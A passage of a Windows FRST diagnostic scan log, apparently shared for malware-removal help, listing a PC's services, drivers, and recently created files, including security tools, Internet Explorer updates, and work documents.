(x86)\McAfee\Host Intrusion Prevention\HIPSCore\x64\HIPSvc.exe [39840 2010-01-26] (McAfee, Inc.) R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [133992 2011-07-12] (Lenovo Group Limited) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation) R2 McAfee SiteAdvisor Enterprise Service; C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McSACore.exe [324928 2011-05-12] (McAfee, Inc.) R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127848 2014-02-20] (McAfee, Inc.) R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [242448 2014-07-18] (McAfee, Inc.) R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208416 2014-01-15] (McAfee, Inc.) R2 mfevtp; C:\Windows\system32\mfevtps.exe [185280 2014-07-18] (McAfee, Inc.) R2 MyDesktopWindows; C:\ProgramData\Oracle\MyDesktop\MyDesktopService.exe [5364224 2013-07-05] (Oracle Corporation) [File not signed] R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [69632 2006-11-08] (Hewlett-Packard) [File not signed] R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [88064 2006-11-08] (Hewlett-Packard) [File not signed] R2 QOSMyDesktop; C:\ProgramData\Oracle\MyDesktop\MyDesktopQOS.exe [470016 2009-10-13] (Oracle) [File not signed] R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] () R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2011-09-01] (Lenovo Group Limited) S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [24120 2014-02-21] () R2 TIRmtSvc; C:\WINDOWS\TIREMOTE\TIRemoteService.exe [210944 2012-05-04] (Numara Software, Inc.) [File not signed] R2 UI Assistant Service; C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\AssistantServices.exe [270672 2012-02-01] () R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed] R2 SAService; %SystemRoot%\system32\SAsrv.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2011-06-02] () R1 DNE; C:\Windows\System32\DRIVERS\dnelwf64.sys [131672 2010-12-06] (Deterministic Networks, Inc.) U5 Firehk; C:\Windows\System32\Drivers\Firehk.sys [56648 2008-10-17] (McAfee, Inc.) R3 FirehkMP; C:\Windows\System32\DRIVERS\firehk.sys [56648 2008-10-17] (McAfee, Inc.) R3 firelm01; C:\Windows\system32\drivers\firelm01.sys [38968 2010-06-15] (McAfee, Inc.) R0 FirePM; C:\Windows\System32\Drivers\FirePM.sys [186784 2010-06-15] (McAfee, Inc.) R1 FireTDI; C:\Windows\system32\Drivers\FireTDI.sys [254520 2010-06-15] (McAfee, Inc.) R3 HIPK; C:\Windows\System32\drivers\HIPK.sys [138904 2010-01-26] (McAfee, Inc.) R3 HIPPSK; C:\Windows\System32\drivers\HIPPSK.sys [45424 2010-01-26] (McAfee, Inc.) R3 HIPQK; C:\Windows\System32\drivers\HIPQK.sys [40152 2010-01-26] (McAfee, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-06] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation) R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [180272 2014-07-18] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [311600 2014-07-18] (McAfee, Inc.) U3 mfeavfk01; No ImagePath R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [782968 2014-07-18] (McAfee, Inc.) S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [107032 2014-07-18] (McAfee, Inc.) S4 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [84424 2010-10-22] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344176 2014-07-18] (McAfee, Inc.) S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52592 2014-06-10] (Cisco Systems, Inc.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-06 21:52 - 2014-09-06 21:52 - 00133028 _____ () C:\Windows\SysWOW64\api_hook_list.dat 2014-09-06 21:52 - 2014-09-06 21:52 - 00002033 _____ () C:\Windows\system32\api_hook_list.dat 2014-09-06 21:51 - 2010-01-26 17:56 - 00040328 _____ (McAfee, Inc.) C:\Windows\SysWOW64\HIPIS0e011b5.dll 2014-09-06 21:51 - 2010-01-26 17:44 - 00047080 _____ (McAfee, Inc.) C:\Windows\system32\HIPIS0e011b5.dll 2014-09-06 21:31 - 2014-09-06 21:31 - 00019523 _____ () C:\Users\akumar\Desktop\bookmarks_9_6_14.html 2014-09-06 00:38 - 2014-09-06 00:38 - 00000000 ____D () C:\Program Files (x86)\ESET 2014-09-06 00:37 - 2014-09-06 00:37 - 02347384 _____ (ESET) C:\Users\akumar\Downloads\esetsmartinstaller_enu(1).exe 2014-09-05 23:58 - 2014-09-05 23:58 - 00001249 _____ () C:\Users\akumar\Desktop\JRT.txt 2014-09-05 22:52 - 2014-09-05 22:52 - 00000000 ____D () C:\Windows\ERUNT 2014-09-05 22:50 - 2014-09-05 22:51 - 01016261 _____ (Thisisu) C:\Users\akumar\Downloads\JRT.exe 2014-09-05 18:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll 2014-09-05 18:44 - 2014-09-05 19:26 - 00000000 ____D () C:\AdwCleaner 2014-09-05 18:44 - 2014-09-05 18:44 - 01370467 _____ () C:\Users\akumar\Downloads\AdwCleaner.exe 2014-09-05 16:37 - 2014-09-05 16:37 - 00001155 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2014-09-05 16:37 - 2014-09-05 16:37 - 00001143 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk 2014-09-05 16:36 - 2014-09-05 16:36 - 00000000 ____D () C:\ProgramData\Mozilla 2014-09-05 16:36 - 2014-09-05 16:36 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-09-05 16:32 - 2014-09-05 16:33 - 35678152 _____ () C:\Users\akumar\Downloads\Firefox Setup 32.0.exe 2014-09-05 15:30 - 2014-09-05 15:30 - 00001233 _____ () C:\Users\akumar\Downloads\stmt (1).txt 2014-09-05 15:16 - 2014-09-05 15:16 - 00001459 _____ () C:\Users\akumar\Downloads\stmt.txt 2014-09-05 14:23 - 2014-09-05 14:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Split & Merge 2014-09-05 14:23 - 2014-09-05 14:23 - 00000000 ____D () C:\Program Files\PDF Split & Merge 2014-09-05 14:22 - 2014-09-05 14:22 - 01226124 _____ (Bureausoft Corporation ) C:\Users\akumar\Downloads\pdfsm.exe 2014-09-05 14:08 - 2014-09-05 14:08 - 21467591 _____ (Andrea Vacondio) C:\Users\akumar\Downloads\download 2014-09-04 23:16 - 2014-09-04 23:16 - 02347384 _____ (ESET) C:\Users\akumar\Downloads\esetsmartinstaller_enu.exe 2014-09-04 21:51 - 2014-09-04 21:51 - 00000904 _____ () C:\Users\akumar\Downloads\fixlist.txt 2014-09-04 21:33 - 2014-09-06 22:48 - 00000000 ____D () C:\Users\akumar\Desktop\FRST 2014-09-04 21:30 - 2014-09-04 21:31 - 00061031 _____ () C:\Users\akumar\Downloads\Addition.txt 2014-09-04 21:27 - 2014-09-04 21:31 - 00067738 _____ () C:\Users\akumar\Downloads\FRST.txt 2014-09-04 21:26 - 2014-09-06 22:48 - 00000000 ____D () C:\FRST 2014-09-04 21:26 - 2014-09-04 21:26 - 02104832 _____ (Farbar) C:\Users\akumar\Downloads\FRST64.exe 2014-09-04 21:17 - 2014-09-04 21:17 - 01096704 _____ (Farbar) C:\Users\akumar\Downloads\FRST.exe 2014-09-04 10:48 - 2014-09-04 10:48 - 00198656 _____ () C:\Users\akumar\Downloads\Oracle_AcmePacket_FINAL_3GPP 23228 PICS.xls 2014-09-03 15:46 - 2014-09-03 15:46 - 00198656 _____ () C:\Users\akumar\Downloads\AcmePacket_FINAL_3GPP 23228 PICS (1).xls 2014-09-03 15:45 - 2014-09-03 15:45 - 00198656 _____ () C:\Users\akumar\Downloads\AcmePacket_FINAL_3GPP 23228 PICS.xls 2014-09-02 21:42 - 2014-09-06 21:55 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-02 21:41 - 2014-09-02 21:41 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-02 21:41 - 2014-09-02 21:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-02 21:39 - 2014-09-02 21:40 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-09-02 21:39 - 2014-09-02 21:39 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-02 21:39 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-09-02 21:39 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-09-02 21:39 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-02 21:37 - 2014-09-02 21:38 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\akumar\Downloads\mbam-setup-2.0.2.1012.exe 2014-08-29 23:10 - 2014-08-29 23:10 - 00789914 _____ () C:\Users\akumar\Downloads\Scanned_object_3 (2).tif 2014-08-29 23:10 - 2014-08-29 23:10 - 00094102 _____ () C:\Users\akumar\Downloads\Scanned_object_4 (1).tif 2014-08-29 23:10 - 2014-08-29 23:10 - 00069283 _____ () C:\Users\akumar\Downloads\Scanned_object_2 (1).tif 2014-08-29 23:09 - 2014-08-29 23:09 - 00175619 _____ () C:\Users\akumar\Downloads\Scanned_object_0 (1).tif 2014-08-29 23:09 - 2014-08-29 23:09 - 00038525 _____ () C:\Users\akumar\Downloads\Scanned_object_1 (1).tif 2014-08-29 23:08 - 2014-08-29 23:08 - 00789914 _____ () C:\Users\akumar\Downloads\Scanned_object_3 (1).tif 2014-08-29 23:07 - 2014-08-29 23:07 - 00118388 _____ () C:\Users\akumar\Downloads\Scanned_object_1.tif 2014-08-29 23:07 - 2014-08-29 23:07 - 00088142 _____ () C:\Users\akumar\Downloads\Scanned_object_2.tif 2014-08-29 23:06 - 2014-08-29 23:06 - 00724152 _____ () C:\Users\akumar\Downloads\Scanned_object_3.tif 2014-08-29 23:06 - 2014-08-29 23:06 - 00072460 _____ () C:\Users\akumar\Downloads\Scanned_object_4.tif 2014-08-29 23:05 - 2014-08-29 23:06 - 00120548 _____ () C:\Users\akumar\Downloads\Scanned_object_5.tif 2014-08-29 23:04 - 2014-08-29 23:04 - 00082421 _____ () C:\Users\akumar\Downloads\Scanned_object_0.tif 2014-08-28 11:12 - 2014-08-28 11:12 - 01600196 _____ () C:\Users\akumar\Downloads\PLSuite training LT.pptx 2014-08-28 11:09 - 2014-08-28 11:10 - 05229194 _____ () C:\Users\akumar\Downloads\PLSuite training_indepth_LT.pptx 2014-08-28 10:08 - 2014-08-28 10:08 - 00472060 _____ () C:\Users\akumar\Downloads\Attachments_2014828.zip 2014-08-27 22:08 - 2014-08-27 22:08 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close (2).xls 2014-08-27 21:35 - 2014-08-27 21:35 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close (1).xls 2014-08-27 21:32 - 2014-08-27 21:32 - 00244224 _____ () C:\Users\akumar\Downloads\Est. Cash to Close.xls 2014-08-27 16:35 - 2014-08-27 16:35 - 00271872 _____ () C:\Users\akumar\Downloads\1-PLM (5).ppt 2014-08-26 16:37 - 2014-08-26 16:37 - 00501672 _____ () C:\Users\akumar\Downloads\Attachments_2014826.zip 2014-08-22 14:17 - 2014-08-22 14:17 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases (2).xlsx 2014-08-22 09:41 - 2014-08-22 09:41 - 00272384 _____ () C:\Users\akumar\Downloads\1-PLM (4).ppt 2014-08-21 16:04 - 2014-08-21 16:04 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases.xlsx 2014-08-21 16:04 - 2014-08-21 16:04 - 00029807 _____ () C:\Users\akumar\Downloads\SMX Performance Test Cases (1).xlsx 2014-08-19 11:05 - 2014-08-19 11:05 - 00003806 _____ () C:\Users\akumar\Downloads\MC_854_CURRENT_VIEW (1).CSV 2014-08-19 11:04 - 2014-08-19 11:04 - 00001049 _____ () C:\Users\akumar\Downloads\MC_854_CURRENT_VIEW.CSV 2014-08-19 10:06 - 2014-08-19 10:06 - 01245025 _____ () C:\Users\akumar\Downloads\Attachments_2014819.zip 2014-08-16 21:25 - 2014-07-24 15:12 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-08-16 21:25 - 2014-07-24 15:06 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-08-16 21:25 - 2014-07-24 15:05 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-08-16 21:25 - 2014-07-24 15:04 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-08-16 21:25 - 2014-07-24 15:04 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-08-16 21:25 - 2014-07-24 15:04 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-08-16 21:25 - 2014-07-24 15:03 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-08-16 21:25 - 2014-07-24 15:03 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-08-16 21:25 - 2014-07-24 15:03 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-08-16 21:25 - 2014-07-24 15:02 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-08-16 21:25 - 2014-07-24 14:07 - 12356608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-08-16 21:25 - 2014-07-24 13:58 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-08-16 21:25 - 2014-07-24 13:51 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-08-16 21:25 - 2014-07-24 13:49 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2014-08-16 21:25 - 2014-07-24 13:49 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2014-08-16 21:25 - 2014-07-24 13:48 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2014-08-16 21:25 - 2014-07-24 13:48 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-08-16 21:25 - 2014-07-24 13:48 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-08-16 21:25 - 2014-07-24 13:48 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-08-16 21:25 - 2014-07-24 13:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2014-08-16 21:24 - 2014-07-24 15:28 - 17861120 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-08-16 21:24 - 2014-07-24 15:10 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-08-16 21:24 - 2014-07-24 15:07 - 01384960 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-08-16 21:24 - 2014-07-24 15:05 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-08-16 21:24 - 2014-07-24 15:05 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-08-16 21:24 - 2014-07-24 15:04 - 02155520 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-08-16 21:24 - 2014-07-24 15:04 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-08-16 21:24 - 2014-07-24 15:04 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-08-16 21:24 - 2014-07-24 15:03 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-08-16 21:24 - 2014-07-24 15:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-08-16 21:24 - 2014-07-24 15:03 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-08-16 21:24 - 2014-07-24 13:57 - 09739264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-08-16 21:24 - 2014-07-24 13:52 - 01137664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-08-16 21:24 - 2014-07-24 13:51 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-08-16 21:24 - 2014-07-24 13:50 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll 2014-08-16 21:24 - 2014-07-24 13:50 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2014-08-16 21:24 - 2014-07-24 13:49 - 01802240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-08-16 21:24 - 2014-07-24 13:49 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-08-16 21:24 - 2014-07-24 13:49 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2014-08-16 21:24 - 2014-07-24 13:48 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll 2014-08-16 21:24 - 2014-07-24 13:48 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe 2014-08-16 21:24 - 2014-07-24 13:48 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe 2014-08-16 10:01 - 2014-06-30 18:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll 2014-08-16 10:01 - 2014-06-30 18:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll 2014-08-16 10:01 - 2014-06-06 02:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2014-08-16 10:01 - 2014-06-06 02:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2014-08-16 10:01 - 2014-03-09 17:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe 2014-08-16 10:01 - 2014-03-09 17:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll 2014-08-16 10:01 - 2014-03-09 17:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe 2014-08-16 10:01 - 2014-03-09 17:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll 2014-08-15 10:55 - 2014-06-03 06:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-08-15 10:55 - 2014-06-03 06:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-08-15 10:55 - 2014-06-03 06:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll 2014-08-15 10:55 - 2014-06-03 06:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe 2014-08-15 10:55 - 2014-06-03 05:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-08-15 10:55 - 2014-06-03 05:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-08-15 10:55 - 2014-06-03 05:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll 2014-08-15 10:53 - 2014-07-13 22:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2014-08-15 10:53 - 2014-07-13 21:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2014-08-15 10:04 - 2014-07-15 23:25 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2014-08-15 10:04 - 2014-07-15 22:46 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2014-08-15 10:04 - 2014-07-15 22:12 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-08-15 10:04 - 2014-06-15 22:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys 2014-08-15 09:52 - 2014-08-15 09:52 - 00271872 _____ () C:\Users\akumar\Downloads\1-PLM (3).ppt 2014-08-15 09:51 - 2014-08-15 09:51 - 00277504 _____ () C:\Users\akumar\Downloads\1-PLM (2).ppt 2014-08-15 09:48 - 2014-08-15 09:48 - 00277504 _____ () C:\Users\akumar\Downloads\1-PLM (1).ppt 2014-08-13 15:46 - 2014-08-13 15:46 - 00027239 _____ () C:\Users\akumar\Downloads\RCS 5.1 SoC_v01.xlsx 2014-08-13 10:46 - 2014-08-13 10:46 - 00680960 _____ () C:\Users\akumar\Downloads\APKT_Standards_v16_working_121106 (1).xls 2014-08-13 10:43 - 2014-08-13 10:43 - 00455158 _____ () C:\Users\akumar\Downloads\33328-c50.zip 2014-08-13 10:32 - 2014-08-13 10:32 - 00221872 _____ () C:\Users\akumar\Downloads\33210-c20.zip 2014-08-13 10:25 - 2014-08-13 10:25 - 00758356 _____ () C:\Users\akumar\Downloads\33203-c40.zip 2014-08-13 10:21 - 2014-08-13 10:21 - 00169527 _____ () C:\Users\akumar\Downloads\33141-c00.zip 2014-08-13 10:10 - 2014-08-13 10:10 - 02114023 _____ () C:\Users\akumar\Downloads\33107-c50.zip 2014-08-12 16:40 - 2014-08-12 16:40 - 00181620 _____ () C:\Users\akumar\Downloads\32600-b00.zip 2014-08-12 16:37 - 2014-08-12 16:37 - 00379072 _____ () C:\Users\akumar\Downloads\32423-b70.zip 2014-08-12 16:33 - 2014-08-12 16:33 - 00649990 _____ () C:\Users\akumar\Downloads\32409-b40.zip 2014-08-12 16:31 - 2014-08-12 16:31 - 00177152 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-299 PICS.xls 2014-08-12 16:29 - 2014-08-12 16:29 - 00156672 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-299 PICS-7.1.2.xls 2014-08-12 16:25 - 2014-08-12 16:25 - 00020912 _____ () C:\Users\akumar\Downloads\PICS for 32.260 (rel 11)-7.1.2.xlsx 2014-08-12 16:25 - 2014-08-12 16:25 - 00016330 _____ () C:\Users\akumar\Downloads\PICS for 32.240 (rel 11)-7.1.2.xlsx 2014-08-12 16:23 - 2014-08-12 16:23 - 00135680 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_32-240 PICS.xls 2014-08-12 16:19 - 2014-08-12 16:19 - 00840537 _____ () C:\Users\akumar\Downloads\32102-b20.zip 2014-08-12 16:17 - 2014-08-12 16:17 - 01255427 _____ () C:\Users\akumar\Downloads\32101-b10.zip 2014-08-12 16:17 - 2014-08-12 16:17 - 01116048 _____ () C:\Users\akumar\Downloads\32101-a10.zip 2014-08-12 16:12 - 2014-08-12 16:12 - 00374456 _____ () C:\Users\akumar\Downloads\29658-c00.zip 2014-08-12 16:09 - 2014-08-12 16:09 - 00439375 _____ () C:\Users\akumar\Downloads\29333-b30.zip 2014-08-12 16:06 - 2014-08-12 16:06 - 00200868 _____ () C:\Users\akumar\Downloads\29329-b70.zip 2014-08-12 16:03 - 2014-08-12 16:03 - 00894564 _____ () C:\Users\akumar\Downloads\29328-bb0.zip 2014-08-12 16:01 - 2014-08-12 16:01 - 00081539 _____ () C:\Users\akumar\Downloads\29278-c00.zip 2014-08-12 15:58 - 2014-08-12 15:58 - 00040447 _____ () C:\Users\akumar\Downloads\AKPT_FINAL_3GPP TS_29-228 PICS.xlsx 2014-08-12 15:53 - 2014-08-12 15:53 - 03680379 _____ () C:\Users\akumar\Downloads\29163-bb0.zip 2014-08-12 15:17 - 2014-08-12 15:17 - 00593322 _____ () C:\Users\akumar\Downloads\29162-b20.zip 2014-08-12 15:14 - 2014-08-12 15:14 - 05833886 _____ () C:\Users\akumar\Downloads\29002-c00.zip 2014-08-12 15:02 - 2014-08-12 15:03 - 05595884 _____ () C:\Users\akumar\Downloads\29002-ba0.zip 2014-08-11 10:44 - 2014-08-11 10:45 - 07804815 _____ () C:\Users\akumar\Downloads\cnt2109553.pptx 2014-08-08 15:07 - 2014-08-08 15:07 - 01539298 _____ () C:\Users\akumar\Downloads\26173-b00 (1).zip 2014-08-08 15:06 - 2014-08-08 15:07 - 01539298 _____ () C:\Users\akumar\Downloads\26173-b00.zip 2014-08-08 15:03 - 2014-08-08 15:03 - 00194939 _____ () C:\Users\akumar\Downloads\26171-b00.zip 2014-08-08 14:59 - 2014-08-08 14:59 - 02605148 _____ () C:\Users\akumar\Downloads\26114-c60.zip 2014-08-08 14:50 - 2014-08-08 14:50 - 01047644 _____ () C:\Users\akumar\Downloads\26073-b00.zip 2014-08-08 14:42 - 2014-08-08 14:42 - 00321588 _____ () C:\Users\akumar\Downloads\26071-b00.zip 2014-08-08 14:39 - 2014-08-08 14:40 - 00439171 _____ () C:\Users\akumar\Downloads\24647-c00.zip 2014-08-08 14:38 - 2014-08-08 14:38 - 00464511 _____ () C:\Users\akumar\Downloads\24642-c00.zip 2014-08-08 14:35 - 2014-08-08 14:35 - 00256205 _____ () C:\Users\akumar\Downloads\24629-c40.zip 2014-08-08 14:34 - 2014-08-08 14:34 - 00938903 _____ () C:\Users\akumar\Downloads\24628-c30.zip 2014-08-08 14:31 - 2014-08-08 14:31 - 00161073 _____ () C:\Users\akumar\Downloads\24623-c30.zip 2014-08-08 14:29 - 2014-08-08 14:29 - 00318647 _____ () C:\Users\akumar\Downloads\24615-b30.zip 2014-08-08 14:28 - 2014-08-08 14:28 - 00208014 _____ () C:\Users\akumar\Downloads\24611-c30.zip 2014-08-08 14:27 - 2014-08-08 14:27 - 00193743 _____ () C:\Users\akumar\Downloads\24610-b30.zip 2014-08-08 14:24 - 2014-08-08 14:24 - 00153761 _____ () C:\Users\akumar\Downloads\24608-b30.zip 2014-08-08 14:15 - 2014-08-08 14:15 - 00159923 _____ () C:\Users\akumar\Downloads\24607-c00.zip 2014-08-08 14:12 - 2014-08-08 14:12 - 00331974 _____ () C:\Users\akumar\Downloads\24605-b10.zip 2014-08-08 14:03 - 2014-08-08 14:03 - 00306914 _____ () C:\Users\akumar\Downloads\24604-b90.zip 2014-08-08 13:42 - 2014-08-08 13:42 - 01327830 _____ () C:\Users\akumar\Downloads\24292-b80.zip 2014-08-08 10:56 - 2014-08-08 10:56 - 03602825 _____ () C:\Users\akumar\Downloads\24237-c30.zip 2014-08-08 10:51 - 2014-08-08 10:51 - 00160406 _____ () C:\Users\akumar\Downloads\24173-c00.zip 2014-08-08 10:46 - 2014-08-08 10:46 - 00703453 _____ () C:\Users\akumar\Downloads\24147-b20.zip 2014-08-08 10:39 - 2014-08-08 10:39 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (3).xlsx 2014-08-08 09:59 - 2014-08-08 09:59 - 00276992 _____ () C:\Users\akumar\Downloads\1-PLM.ppt 2014-08-07 14:57 - 2014-08-07 14:57 - 00726086 _____ () C:\Users\akumar\Downloads\24141-c10.zip 2014-08-07 14:47 - 2014-08-07 14:47 - 00392134 _____ () C:\Users\akumar\Downloads\23517-800.zip 2014-08-07 14:30 - 2014-08-07 14:30 - 01524884 _____ () C:\Users\akumar\Downloads\23335-b00.zip 2014-08-07 14:03 - 2014-08-07 14:03 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (2).xlsx 2014-08-07 14:02 - 2014-08-07 14:02 - 00036074 _____ () C:\Users\akumar\Downloads\RFP-Boilerplate for SMX (1).xlsx ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-06 22:48 - 2014-09-04 21:33 - 00000000 ____D () C:\Users\akumar\Desktop\FRST 2014-09-06 22:48 - 2014-09-04 21:26 - 00000000 ____D () C:\FRST 